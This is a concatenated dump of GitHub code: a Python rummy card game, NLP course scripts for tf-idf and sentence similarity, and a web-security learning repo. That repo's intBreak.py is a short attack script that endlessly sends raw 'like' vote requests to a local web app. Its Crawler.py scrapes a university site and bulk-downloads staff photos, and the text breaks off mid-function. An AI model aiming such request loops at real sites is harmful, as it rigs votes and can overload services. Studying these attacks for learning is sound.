parser.add_argument(\"--url\", help=\"URL to the datafile\", type=str, required=True)\n args = parser.parse_args()\n main(args.url)\n \n"
}
] | 2 |
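The browser tally in `assignment3.py` above chains four `re.search` branches; the same count can be expressed with one alternation and `collections.Counter`. Note this relies on "Chrome" preceding "Safari" inside Chrome user-agent strings; the agents below are invented stand-ins:

```python
import re
from collections import Counter

agents = [  # hypothetical user-agent strings, for illustration only
    "Mozilla/5.0 (X11; Linux x86_64; rv:40.0) Gecko/20100101 Firefox/40.1",
    "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 Chrome/45.0 Safari/537.36",
    "Mozilla/5.0 (Macintosh) AppleWebKit/601.1 Version/9.0 Safari/601.1",
]

counts = Counter()
for ua in agents:
    m = re.search(r"Firefox|Chrome|Safari|MSIE|Trident", ua)  # leftmost match wins
    if m:
        counts[m.group()] += 1

print(counts)  # Counter({'Firefox': 1, 'Chrome': 1, 'Safari': 1})
```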
Frank-Triolo/Continental_Game
|
https://github.com/Frank-Triolo/Continental_Game
|
e44bff1bb69e3078adc1d3db027fe045f3ecd7a1
|
85dc9a4c5dec4cc3c70a786a9921eea87c4cb612
|
b4c8147e6ec20be8286c51d19431cf73e2c95b25
|
refs/heads/master
| 2023-01-01T23:45:33.002599 | 2020-10-18T21:53:29 | 2020-10-18T21:53:29 | 305,202,913 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5243351459503174,
"alphanum_fraction": 0.5651446580886841,
"avg_line_length": 19.47945213317871,
"blob_id": "73c1a011675bc4c1d5fe58a42e5a8e51492f44dc",
"content_id": "b37d193cca02e94ad1c91b7dfdac09446e8bacdb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5979,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 292,
"path": "/main.py",
"repo_name": "Frank-Triolo/Continental_Game",
"src_encoding": "UTF-8",
"text": "import random\nfrom random import shuffle\nfrom itertools import combinations\nimport time\n\nFinal = []\nfor line in open(\"outfile.txt\",'r'):\n Final.append(int(line.strip()))\n\ndef list_prod(L):\n p = 1\n for x in L:\n p *= x\n return p\n\ndef calculate_done(prod,possible):\n #print(prod)\n ret = False\n if prod == 1:\n print(\"Valid hand!\")\n return True\n for melds in possible:\n if prod%melds == 0:\n ret = calculate_done(prod//melds,possible)\n if ret == True:\n return True\n #print(ret)\n #print(\"Not Valid Hand\")\n return False\n\n\nclass Card:\n def __init__(self, name, suit):\n self.name = str(name)\n self.suit = suit\n self.hidden = 0\n try:\n if int(name) <= 10:\n self.val = int(name)\n except:\n if name == \"King\" or name == \"Queen\" or name == \"Jack\":\n self.val = 10\n elif name == \"Joker\":\n self.val = 0\n else:\n self.val = 15\n def __str__(self):\n return self.name + \" of \" + self.suit + \": \" + str(self.hidden)\n def set_hidden(self,n):\n self.hidden = int(n)\n\nclass Deck:\n def __init__(self):\n self.cards = []\n\n def add_card(self, card_input):\n self.cards.append(card_input)\n \n def remove_card(self):\n return self.cards.pop(0)\n\n def clear(self):\n self.cards = []\n \n def __str__(self):\n return str(len(self.cards))\n\n def shuffle(self):\n shuffle(self.cards)\n\nclass Pile:\n def __init__(self):\n self.cards = []\n \n def remove_card(self):\n return self.cards.pop(-1)\n \n def clear(self):\n self.cards = []\n \n def add_card(self,c):\n self.cards.append(c)\n \n def __str__(self):\n return str(self.cards[-1])\n\nclass Player:\n def __init__(self):\n self.hand = []\n self.points = 0\n self.complete = False\n self.score = 0\n self.hidden = []\n \n def take_from_deck(self, d):\n c = d.remove_card()\n self.hand.append(c)\n self.points += c.val\n self.hidden.append(c.hidden)\n\n def take_from_pile(self, p):\n c = p.remove_card()\n self.hand.append(c)\n self.hidden.append(c.hidden)\n self.points += c.val\n \n def throw_rand(self,p):\n c = random.choice(self.hand)\n self.hand.remove(c)\n self.hidden.remove(c.hidden)\n self.points -= c.val\n p.add_card(c)\n \n def throw_card(self, c, p):\n self.hand.remove(c)\n self.hidden.remove(c.hidden)\n self.points -= c.val\n p.add_card(c)\n\n def throw_by_hidden(self,n,p):\n for c in self.hand:\n print(c.hidden)\n if c.hidden == n:\n self.hand.remove(c)\n self.hidden.remove(c.hidden)\n self.points -= c.val\n p.add_card(c)\n return\n\n def __len__(self):\n return len(self.hand)\n \n def is_complete(self): \n all_combos = combinations(self.hidden, 10)\n\n for combo in all_combos:\n l_p = list_prod(combo)\n print(l_p)\n if calculate_done(l_p,Final) == True:\n return True\n return False\n \n def __str__(self):\n l = []\n for c in self.hand:\n l.append(str(c))\n l.append('\\n')\n return '\\n'.join(l)\n\nP = [ # Products-To-Be\n [241,\"Hearts\",\"Diamonds\",\"Spades\",\"Clubs\"],\n [0,41,101,167,239],\n ['2',2,43,103,173],\n ['3',3,47,107,179],\n ['4',5,53,109,181],\n ['5',7,59,113,191],\n ['6',11,\t61,\t127,\t193],\n ['7',13,\t67,\t131,\t197],\n ['8',17,\t71,\t137,\t199], \n ['9',19,\t73,\t139,\t211],\n ['10',23,\t79,\t149,\t223],\n ['J',29,\t83,\t151,\t227],\n ['Q',31,\t89,\t157,\t229],\n ['K',37,\t97,\t163,\t233],\n ['A',41,\t101,\t167,\t239]\n]\n\nCard_Pile = Pile()\nCard_Deck = Deck()\nP1 = Player()\nP2 = Player()\n\ndef Make_Round(round_number): \n for i in range(2):\n All_Vals = list(range(2,11,1))\n All_Vals += [\"Jack\",\"Queen\",\"King\",\"Ace\"]\n All_Suits = 
[\"Hearts\",\"Diamonds\",\"Spades\",\"Clubs\"]\n for val in range(len(All_Vals)):\n for suit in range(len(All_Suits)):\n c = Card(str(All_Vals[val]),All_Suits[suit])\n c.set_hidden(P[val+2][suit+1])\n #print(c)\n Card_Deck.add_card(c)\n Card_Deck.shuffle()\n\n for i in range(10):\n P1.take_from_deck(Card_Deck)\n P2.take_from_deck(Card_Deck)\n #print(len(P1))\n P1.take_from_deck(Card_Deck)\n P1.throw_rand(Card_Pile)\n '''\n if round_number % 2 == 0:\n P1.take_from_deck(Card_Deck)\n else:\n P2.take_from_deck(Card_Deck)\n '''\n\n\ndef Clear_Round():\n Card_Deck.clear()\n Card_Pile.clear()\n\nt1 = time.time()\n\nround_num = 0\nturn = 0\n\nMake_Round(round_num)\n\ndone = False\n\nwhile (not done):\n \n if turn == 0:\n if round_num %2 == 0:\n P1.take_from_deck(Card_Deck)\n print(P1)\n done = P1.is_complete()\n h = int(input(\"Input hidden to remove: \"))\n P1.throw_by_hidden(h,Card_Pile)\n turn += 1\n continue\n else:\n P2.take_from_deck(Card_Deck)\n print(P2)\n done = P2.is_complete()\n P1.throw_rand(Card_Pile)\n turn += 1\n continue\n print()\n ran = random.random()\n if turn%2 == 0:\n print(len(P1))\n print(P1)\n print(Card_Pile)\n take = input(\"Input Pile (p) or Deck (d): \")\n \n if take.lower() == 'p':\n P1.take_from_pile(Card_Pile)\n else:\n P1.take_from_deck(Card_Deck)\n #which to take from?\n print(len(P1))\n print(P1)\n \n done = P1.is_complete() # This should be done before the throw\n if done == True:\n break\n\n h = int(input(\"Input hidden to remove: \"))\n P1.throw_by_hidden(h,Card_Pile)\n\n '''\n if ran > 0.5:\n P1.take_from_deck(Card_Deck)\n else:\n P1.take_from_deck(Card_Pile)\n done = P1.is_complete()\n if done == False:\n P1.throw_rand(Card_Pile)\n '''\n else:\n if ran > 0.5:\n P2.take_from_deck(Card_Deck)\n else:\n P2.take_from_pile(Card_Pile)\n done = P2.is_complete()\n if done == False:\n P2.throw_rand(Card_Pile)\n\n turn += 1\n\nprint(turn)\n\nt2 = time.time()\n\nprint(str(t2-t1))\n\n'''\nwhile (P1.score < 100 and P2.score < 100):\n Card_Deck.clear()\n Card_Pile.clear()\n for val in All_Vals:\n for suit in All_Suits:\n c = Card(val,suit)\n Card_Deck.add_card(c)\n\n while (P1.complete == False and P2.complete == False):\n break\n P1.score += P1.points\n'''"
},
{
"alpha_fraction": 0.5019920468330383,
"alphanum_fraction": 0.525896430015564,
"avg_line_length": 24.100000381469727,
"blob_id": "eb9a3e3e2460976ee164ddb5e4df8cb91f04c893",
"content_id": "5c5f8d0f36754c8d123c42a3665def5c48964253",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 251,
"license_type": "no_license",
"max_line_length": 61,
"num_lines": 10,
"path": "/Card_Class.py",
"repo_name": "Frank-Triolo/Continental_Game",
"src_encoding": "UTF-8",
"text": "class Card:\n def __init__(self, name, suit):\n self.name = name\n self.suit = suit\n if int(name) <= 10:\n self.val = int(name)\n elif name == \"King\" or name == \"Queen\" or name == \"Jack\":\n self.val = 10\n else:\n self.val = 15\n"
},
{
"alpha_fraction": 0.5866900086402893,
"alphanum_fraction": 0.5901926159858704,
"avg_line_length": 20.923076629638672,
"blob_id": "8ef474cf93a877bcab82e78357dc30b3dbd991fe",
"content_id": "41398b819444fc8b5441d8b3f68303ddb5de3c98",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 571,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 26,
"path": "/Player.py",
"repo_name": "Frank-Triolo/Continental_Game",
"src_encoding": "UTF-8",
"text": "class Player:\n def __init__(self):\n self.hand = []\n self.points = 0\n self.complete = False\n self.score = 0\n \n def take_from_deck(self, d):\n c = d.remove_card()\n self.hand.append(c)\n self.points += c.val\n\n def take_from_pile(self, p):\n c = p.remove_card()\n self.hand.append(c)\n self.points += c.val\n \n def throw_card(self, c, p):\n self.hand.remove(c)\n self.points -= c.val\n p.add_card(c)\n \n def is_complete(self): \n done = False\n # Write checking code to determine whether hand is complete\n self.complete = done\n\n"
},
{
"alpha_fraction": 0.6166666746139526,
"alphanum_fraction": 0.6222222447395325,
"avg_line_length": 19,
"blob_id": "a1c029d01f8bc954d9e9ff49fdda48d61400c5b6",
"content_id": "211b5261036a88f7717690ca0a77b5cc1c01b35e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 180,
"license_type": "no_license",
"max_line_length": 33,
"num_lines": 9,
"path": "/Deck.py",
"repo_name": "Frank-Triolo/Continental_Game",
"src_encoding": "UTF-8",
"text": "class Deck:\n def __init__(self):\n self.cards = []\n\n def add_card(self, card_input):\n self.cards.append(card_input)\n \n def remove_card(self):\n return self.cards.pop(0)\n"
},
{
"alpha_fraction": 0.7696969509124756,
"alphanum_fraction": 0.7848485112190247,
"avg_line_length": 35.66666793823242,
"blob_id": "0c067f0ad02309d3862389df762d1ade967563a6",
"content_id": "aa32c97c04b964cfa1d9eafadb90847b3aca7214",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 330,
"license_type": "no_license",
"max_line_length": 143,
"num_lines": 9,
"path": "/README.txt",
"repo_name": "Frank-Triolo/Continental_Game",
"src_encoding": "UTF-8",
"text": "# Continental_Game\nImplementation of Continental Game\n\nThis game is a 10-card rummy variant in which 3 cards are needed to make a valid meld/set.\n\nBy assigning each card to a prime number, we can calculate all of the different possible hand types that can result in a complete 10-card hand.\n\nTO-DO:\n Implement AI to play against\n"
}
] | 5 |
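README.txt above describes the repo's core trick: map each card to a prime so that a 3-card meld becomes a product of three primes, and a hand is valid exactly when its product factors completely into meld products, which is what `calculate_done()` in `main.py` recurses on. The idea in miniature, with toy primes rather than the game's real card-to-prime table:

```python
def is_valid(prod, meld_products):
    """True if prod factors completely into the given meld products."""
    if prod == 1:
        return True
    return any(prod % m == 0 and is_valid(prod // m, meld_products)
               for m in meld_products)

melds = [2 * 3 * 5, 7 * 11 * 13]        # two known-good 3-card melds
hand = 2 * 3 * 5 * 7 * 11 * 13          # a 6-card hand made of both melds
assert is_valid(hand, melds)
assert not is_valid(hand * 17, melds)   # one leftover card breaks the hand
```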
chao665190/Some_Course_Projects
|
https://github.com/chao665190/Some_Course_Projects
|
5c660702a7eff836426ea7460b0591ffa903fa89
|
ade53d7b6557ea16a4ae15122b90f3cfaf93240c
|
53194313cafaa396c7c0afc4de355756d733f0ba
|
refs/heads/master
| 2022-11-14T04:08:29.182597 | 2022-01-01T01:53:00 | 2022-01-01T01:53:00 | 277,912,948 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6861076354980469,
"alphanum_fraction": 0.7018773555755615,
"avg_line_length": 41.4361686706543,
"blob_id": "9ca3fff5a3d9372494ee47e63e219cbc72e5bd20",
"content_id": "4b601ed8c17de09191a54d47a2e5bcd659c2dbf1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3998,
"license_type": "no_license",
"max_line_length": 159,
"num_lines": 94,
"path": "/text_preprocess_and_TF_x _IDF.py",
"repo_name": "chao665190/Some_Course_Projects",
"src_encoding": "UTF-8",
"text": "from bs4 import BeautifulSoup\nfrom nltk.stem.snowball import SnowballStemmer\nfrom sklearn.feature_extraction import text\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.feature_extraction.text import TfidfTransformer\n\nimport numpy as np\nimport random\n\n\n\ndata = []\nletter = [\"A\",\"B\",\"C\",\"D\",\"E\",\"F\",\"G\",\"H\",\"I\",\"J\"]\nmin_df = 2 # if a word emerges in less than 2 doc, than, not be considered\nmax_df = 0.7 #float,percentage\nlowercase = True # could change\n\nfor i in range(1,101):\n\tpadnumber = '{:04d}'.format(i) #000x\n\tfor fileletter in letter:\n\t\tfile = open(\"/Users/chaowang/Desktop/Descubrimiento_De_Información_En_Textos/7/BankSearch-reduced/{}{}.txt\".format(fileletter,padnumber), encoding='cp1252')\n\t\tmystr = file.read()\n\t\t# index = mystr.find(\"<html>\") #extract text from HTML\n\t\t# mystr = mystr[index:]\n\t\t# soup = BeautifulSoup(mystr, 'html.parser')#parse a html file, analisis as html file\n\t\tt = mystr # soup.get_text()\n\t\tdata.append((t, fileletter))#reprepare for shuffle\t# every element is a tuple\n\nrandom.shuffle(data)\nprint('Num of doc: ',len(data)) # for verification\ntrain_data = ([], [])#(texts, classes)\t#[0],[1]\t#tuple\t# every element is a list\ntest_data = ([], [])\nfor i in range(1000):\n\tif i < 700:\n\t\ttrain_data[0].append(data[i][0])\n\t\ttrain_data[1].append(data[i][1])\n\telse:\n\t\ttest_data[0].append(data[i][0])\n\t\ttest_data[1].append(data[i][1])\n\nprint('Num of doc: ',len(train_data[0])) # for verification\nprint('Num of doc: ',len(test_data[0]))\n\n\ndef Stemmer(Data):\n for i in range(len(Data)):\n Data[i] = ' '.join(map(SnowballStemmer('english').stem, CountVectorizer().build_analyzer()(Data[i]))) # to stem every word\n\ndef Counter(train, test):\n Stemmer(train)\n Stemmer(test)\n #Convert a collection of text documents to a matrix of token counts:\n count_vect = CountVectorizer(max_df=max_df, min_df=min_df, lowercase=lowercase, stop_words=text.ENGLISH_STOP_WORDS) ## sklearn stopwords\n X_train_counts = count_vect.fit_transform(train)\n print('Shape of train =',X_train_counts.shape)\n X_test_counts = count_vect.transform(test)\n print('Shape of test =',X_test_counts.shape) # builds vectors\n # the same vocabulary\n print(count_vect.get_feature_names()[1947]) # 1947 for verfication: what is the 1974 attribute word in the metrix\n return X_train_counts, X_test_counts, count_vect.get_feature_names()\n\ntrain_counts, test_counts, vocabulary = Counter(train_data[0], test_data[0]) # text converts to metrix\n\nfrom sklearn.feature_extraction.text import TfidfTransformer # convert a count metrix to tfidf metrix\ndef tfidf(X_train_counts, X_test_counts):\n tfidf_transformer = TfidfTransformer()\n X_train_tfidf = tfidf_transformer.fit_transform(X_train_counts) #fit to data, then transform it. 
(find a funtion that suits those datas)\n X_test_tfidf = tfidf_transformer.transform(X_test_counts)\n print(X_train_tfidf.shape)\n print(X_test_tfidf.shape)\n return X_train_tfidf, X_test_tfidf\n\ntrain_tfidf, test_tfidf = tfidf(train_counts, test_counts)\n\ntrain_arff = open(\"/Users/chaowang/Desktop/Descubrimiento_De_Información_En_Textos/7/BankSearch-reduced/train.arff\", \"w\")\ntest_arff = open(\"/Users/chaowang/Desktop/Descubrimiento_De_Información_En_Textos/7/BankSearch-reduced/test.arff\", \"w\") # Open it by writing\n\ntrain_arff.write(\"@RELATION train\\n\\n\")\ntest_arff.write(\"@RELATION train\\n\\n\")\n\ntrain_arff.write(\"@ATTRIBUTE Label {A,B,C,D,E,F,G,H,I,J}\\n\")\ntest_arff.write(\"@ATTRIBUTE Label {A,B,C,D,E,F,G,H,I,J}\\n\")\n\nfor i in range(train_tfidf.shape[1]):\n\ttrain_arff.write(\"@ATTRIBUTE {} numeric\\n\".format(vocabulary[i]))\n\ttest_arff.write(\"@ATTRIBUTE {} numeric\\n\".format(vocabulary[i]))\n\ntrain_arff.write(\"\\n@DATA\\n\")\ntest_arff.write(\"\\n@DATA\\n\")\n\nfor i in range(700):\n\ttrain_arff.write(\"{},{}\\n\".format(train_data[1][i], ','.join(str(v) for v in train_tfidf.toarray()[i])))\nfor i in range(300):\n\ttest_arff.write(\"{},{}\\n\".format(test_data[1][i], ','.join(str(v) for v in test_tfidf.toarray()[i])))\n\n\n\t\n\n\n"
},
{
"alpha_fraction": 0.6702473163604736,
"alphanum_fraction": 0.6934798955917358,
"avg_line_length": 23.85714340209961,
"blob_id": "2b06d5bae8f6e91fe3846b63e5456457977298b7",
"content_id": "34a7a4609492293d05fab375719f6539ed718a40",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4047,
"license_type": "no_license",
"max_line_length": 131,
"num_lines": 161,
"path": "/nlp_task_similarity.py",
"repo_name": "chao665190/Some_Course_Projects",
"src_encoding": "UTF-8",
"text": "from gensim.models import KeyedVectors\nimport nltk\nfrom nltk import word_tokenize\nfrom nltk.corpus import genesis\nfrom nltk.corpus import wordnet as wn\nfrom nltk.corpus import wordnet_ic\nimport numpy as np\nfrom sklearn.metrics.pairwise import cosine_similarity\nfrom scipy.stats import pearsonr\n\nbrown_ic = wordnet_ic.ic('ic-brown.dat')\ngenesis_ic = wn.ic(genesis, False, 0.0)\nsemcor_ic = wordnet_ic.ic('ic-semcor.dat')\nic = semcor_ic\n\ncache_map = {}\nmodel = None\n\n\ndef EliminateToken(tokens):\n\ttuples = nltk.pos_tag(tokens)\n\ttokens = []\n\tfor token, pos in tuples:\n\t\tif pos != \"CC\" and pos != \"TO\" and pos != \"DT\":\n\t\t\ttokens.append(token)\n\treturn tokens\n\ndef Stemmer(tokens):\n\tnew_tokens = []\n\tporter = nltk.PorterStemmer()\n\tfor t in tokens:\n\t\tt = porter.stem(t)\n\t\tif len(t) != 1 or t.isalnum():\n\t\t\tnew_tokens.append(t)\n\treturn new_tokens\n\n\ndef FindMaxSimForPos(w, wi, pos):\n\tw_synsets = wn.synsets(w, pos)\n\twi_synsets = wn.synsets(wi, pos)\n\tmax_sim = 0\n\tfor w_synset in w_synsets:\n\t\tfor wi_synset in wi_synsets:\n\t\t\t#if w_synset.pos() not in ic or wi_synset.pos() not in ic:\n\t\t\t\t#continue\n\t\t\tsim = wn.path_similarity(w_synset, wi_synset)\n\t\t\tif sim == 1:\n\t\t\t\treturn 1\n\t\t\tif sim != None:\n\t\t\t\tmax_sim = max(max_sim, sim)\n\treturn max_sim\t\t\t\n\ndef FindMaxSim(w, wi):\n\tif wi == w:\n\t\treturn 1\n\tif (w, wi) in cache_map:#共8000多个句子,之前找过的单词对存入cache,节省计算量\n\t\treturn cache_map[(w, wi)]\n\tmax_sim = 0\n\tmax_sim = max(max_sim, FindMaxSimForPos(w, wi, wn.NOUN))\n\tif max_sim == 1:\n\t\tcache_map[(w, wi)] = 1\n\t\treturn 1\n\tmax_sim = max(max_sim, FindMaxSimForPos(w, wi, wn.ADJ))\n\tif max_sim == 1:\n\t\tcache_map[(w, wi)] = 1\n\t\treturn 1\n\tmax_sim = max(max_sim, FindMaxSimForPos(w, wi, wn.ADV))\n\tif max_sim == 1:\n\t\tcache_map[(w, wi)] = 1\n\t\treturn 1\n\tmax_sim = max(max_sim, FindMaxSimForPos(w, wi, wn.VERB))\n\tcache_map[(w, wi)] = max_sim\n\treturn max_sim\n\n\ndef FindMaxSimInSentence(w, t):\n\tmax_sim = 0\n\tfor wi in t:\n\t\tmax_sim = max(max_sim, FindMaxSim(w, wi))\n\t\tif max_sim == 1:\n\t\t\tbreak\n\t\n\treturn max_sim\n\ndef BuildWordNetBasedVectors(s1, s2):\n\tt1 = set(s1)\n\tt2 = set(s2)\n\n\tt = sorted(t1.union(t2))\n\n\tv1 = []\n\tv2 = []\n\tfor w in t:\n\t\tv1.append(FindMaxSimInSentence(w, t1))\n\t\tv2.append(FindMaxSimInSentence(w, t2))\t\n\treturn np.array(v1), np.array(v2)\n\n\ndef BuildWord2VecBasedVectors(s1, s2):\n\tv1 = np.zeros(model.vector_size)\n\tv2 = np.zeros(model.vector_size)\n\tfor word in s1:\n\t\tif word in model.vocab:\n\t\t\tv1 += model.word_vec(word)\n\n\tfor word in s2:\n\t\tif word in model.vocab:\n\t\t\tv2 += model.word_vec(word)\n\treturn v1, v2\n\n\nf = open('/Users/chaowang/Desktop/nlp/final_task/stsbenchmark/sts-train.csv')\n\nscorelist = []\nsentencetokens = []\n\npattern = r'''(?x) # set flag to allow verbose regexps\n\t\t\\w+ # words with optional internal hyphens\n\t '''\n\nwnl = nltk.WordNetLemmatizer()\n\nuse_word2vec = False\neliminate_token = True\nlower_case = True\nlemmatize_token = True\n\nif use_word2vec:\n\tmodel = KeyedVectors.load_word2vec_format('/Users/chaowang/Desktop/nlp/final_task/GoogleNews-vectors-negative300.bin',binary=True)\n\nfor line in f:\n\tline = line.strip()\n\telements = line.split(\"\\t\")\n\t\n\tscorelist.append(float(elements[4]))\n\n\tsentence1token = nltk.regexp_tokenize(elements[5], pattern)\n\tsentence2token = nltk.regexp_tokenize(elements[6], pattern)\n\tif eliminate_token:\n\t\tsentence1token = 
EliminateToken(sentence1token)\n\t\tsentence2token = EliminateToken(sentence2token)\n\tif lower_case:\n\t\tsentence1token = [letters.lower() for letters in sentence1token]\n\t\tsentence2token = [letters.lower() for letters in sentence2token]\n\tif lemmatize_token:\n\t\tsentence1token = [wnl.lemmatize(t) for t in sentence1token]\n\t\tsentence2token = [wnl.lemmatize(t) for t in sentence2token]\n\n\tsentencetokens.append([sentence1token, sentence2token])\n\nsimlist = []\nfor elem in sentencetokens:\n\tif use_word2vec:\n\t\tv1, v2 = BuildWord2VecBasedVectors(elem[0], elem[1])\n\telse:\n\t\tv1, v2 = BuildWordNetBasedVectors(elem[0], elem[1])\n\t\n\tcos_sim = cosine_similarity(v1.reshape(1,-1), v2.reshape(1,-1))[0][0]\n\tsimlist.append(cos_sim)\n\nprint(pearsonr(simlist, scorelist))\n\n"
}
] | 2 |
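Both scripts above follow the same skeleton: turn text into counts, re-weight with tf-idf, then compare vectors by cosine. A compressed, self-contained version of that pipeline on a tiny invented corpus (requires scikit-learn, as the originals do):

```python
from sklearn.feature_extraction.text import CountVectorizer, TfidfTransformer
from sklearn.metrics.pairwise import cosine_similarity

docs = ["the cat sat", "the cat sat on the mat", "stocks fell sharply"]

counts = CountVectorizer().fit_transform(docs)   # bag-of-words counts
tfidf = TfidfTransformer().fit_transform(counts) # re-weighted by tf-idf

sims = cosine_similarity(tfidf)                  # pairwise document similarity
print(sims.round(2))  # docs 0 and 1 should score far higher than 0 and 2
```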
JonLMyers/WebSecurity
|
https://github.com/JonLMyers/WebSecurity
|
e075bf12914bfde167daef515518b84a187a5ce0
|
5a840bc316c32b9046035706373700831e6336b0
|
3f59ea2dcc21319d1af488558c8cd0b2dd117b09
|
refs/heads/master
| 2021-01-17T12:44:58.071326 | 2016-11-29T23:58:41 | 2016-11-29T23:58:41 | 68,342,121 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.782608687877655,
"alphanum_fraction": 0.782608687877655,
"avg_line_length": 44.5,
"blob_id": "ca0647f706bda63cdfcae375430a2d626b986350",
"content_id": "66053161254db99613669f7681acb49afb2b2305",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 92,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 2,
"path": "/README.md",
"repo_name": "JonLMyers/WebSecurity",
"src_encoding": "UTF-8",
"text": "# WebSecurity\nA series of tools, exploits, and POC's for learning web application secuity. \n"
},
{
"alpha_fraction": 0.5625841021537781,
"alphanum_fraction": 0.6096904277801514,
"avg_line_length": 27.538461685180664,
"blob_id": "99b5af590af083d13e5f623c28d67266add3c745",
"content_id": "c75707cc781b0647b4bdf32f3d9e2b6f4fb28ee1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 743,
"license_type": "no_license",
"max_line_length": 101,
"num_lines": 26,
"path": "/intBreak.py",
"repo_name": "JonLMyers/WebSecurity",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python\nimport socket\nimport urllib\n\ndef Connect(host, port):\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.connect((host, port))\n return s\n\ndef SendDataA1(s):\n con = \"GET /posts/1/vote/like HTTP/1.1\\n\"\n host = \"Host: localhost\\n\"\n leng = \"Content-Length: 2\\n\\n\"\n breaker = \"Connection: close\\n\"\n ua = \"User-Agent: Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0\\n\"\n b = \"Accept: */*\\n\"\n a = \"Accept-Language: en-US,en;q=0.5\\n\"\n c = \"Accept-Encoding: gzip, deflate, br\\n\"\n n = \"X-Requested-With: XMLHttpRequest\\n\"\n\n s.send(con + host + ua + b + a + c + n + breaker + leng)\n\nwhile(1):\n s = Connect(\"localhost\", 3000)\n SendDataA1(s) \n s.close()\n\n"
},
{
"alpha_fraction": 0.5200182795524597,
"alphanum_fraction": 0.5411804914474487,
"avg_line_length": 29.144826889038086,
"blob_id": "02206066d2f498a3a0b22add95c43dff6656b8a0",
"content_id": "7a9d026d8c8d2481fa5275877245b53a6599f566",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8742,
"license_type": "no_license",
"max_line_length": 108,
"num_lines": 290,
"path": "/WebCrawler/Crawler.py",
"repo_name": "JonLMyers/WebSecurity",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python\nimport urllib2\nimport urllib\nimport socket\nimport re\nimport time\nimport os\nimport threading\nimport sys\nimport argparse\nimport mechanize\nimport urlparse\nimport urllib\nimport ssl\nimport errno\nimport json\nimport csv\nimport pandas\nfrom urlparse import urlsplit\nfrom lxml.html import parse\nfrom socket import error as SocketError\nfrom BeautifulSoup import BeautifulSoup, SoupStrainer\nmaxConnections = 5\npool = threading.BoundedSemaphore(value=maxConnections)\n\n\ndef Connect(url, port):\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.settimeout(10)\n if port == 443:\n sock = ssl.wrap_socket(s)\n print \"Connecting to: {}:{}\".format(url, port)\n try:\n sock.connect((url, port))\n except SocketError as e:\n print e\n sock.settimeout(None)\n #sock.setblocking(0)\n return sock\n else:\n s.connect((url, port))\n s.settimeout(None)\n #s.setblocking(0)\n return s\n\ndef ScrapeCsecWeb(s):\n request = \"GET /programs/computing-security-bs HTTP/1.1\\n\"\n requestHost = \"Host: www.rit.edu\\n\\n\"\n fullResponse = ''\n i = 0;\n s.send(request + requestHost)\n\n while True:\n response = s.recv(2048)\n fullResponse = fullResponse + response\n if response == '':\n break\n\n s.close()\n\n soup = BeautifulSoup(fullResponse)\n courses = soup.findAll('table')[0].tbody.findAll('tr')\n for course in courses:\n if i > 1 and len(course.findAll('td')) > 2:\n number = course.findAll('td')[0].contents\n name = course.findAll('td')[1].contents\n number = ''.join(number)\n name = ''.join(name)\n number = number.replace(u'\\xa0', \"1\")\n if number != \"1\":\n number = number.replace(\"1 1\", \"\")\n print number + name\n i = i + 1\n\ndef DownloadImage(img2, i):\n image = ''\n img2 = img2.replace(\" \", \"%20\")\n if len(img2) < 350:\n s = Connect('www.rit.edu', 80)\n request = \"GET \" + img2 + \" HTTP/1.1\\n\"\n print request\n agent = \"User-Agent: Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0\\n\"\n lang = \"Accept-Language: en-US,en;q=0.5\\n\"\n con = \"Upgrade-Insecure-Requests: 1\\n\"\n encoding = \"Accept-Encoding: gzip, deflate\\n\"\n noCache = \"Cache-Control: no-store, no-cache, must-revalidate, max-age=0\\n\"\n prag = \"Pragma: no-cache\\n\"\n connection = \"Connection: keep-alive\\n\"\n requestHost = \"Host: www.rit.edu\\r\\n\\r\\n\"\n pool.acquire() \n s.send(request + encoding + connection + prag + noCache + agent + lang + con + requestHost)\n while True:\n response = s.recv(2048)\n if len(response) < 1: break\n image = image + response\n \n s.close()\n pool.release()\n \n pos = image.find(\"\\r\\n\\r\\n\")\n image = image[pos + 4:]\n imgFile = \"/home/soren/Github/WebSecurity/pictures/image\" + str(i) + \".jpg\"\n fhand = open(imgFile, 'w+')\n fhand.write(image)\n fhand.close()\n\ndef ScrapeCsecImages(s):\n request = \"GET /gccis/computingsecurity/people HTTP/1.1\\n\"\n requestHost = \"Host: www.rit.edu\\r\\n\\r\\n\"\n noCache = \"Cache-Control: no-cache, no-store, must-revalidate\\n\"\n imgList = []\n threads = []\n\n fullResponse = ''\n i = 1\n s.send(request + noCache + requestHost)\n\n while True:\n response = s.recv(2048)\n if response == '':\n break \n fullResponse = fullResponse + response\n s.close()\n\n soup = BeautifulSoup(fullResponse)\n imgs = soup.findAll(\"div\", {\"class\":\"staff-picture\"})\n for img in imgs:\n imgList.append(str(img.findAll('img')[0].get('src')))\n \n for img2 in imgList:\n \n t = threading.Thread(target=DownloadImage, args=(img2, i))\n threads.append(t)\n t.start()\n 
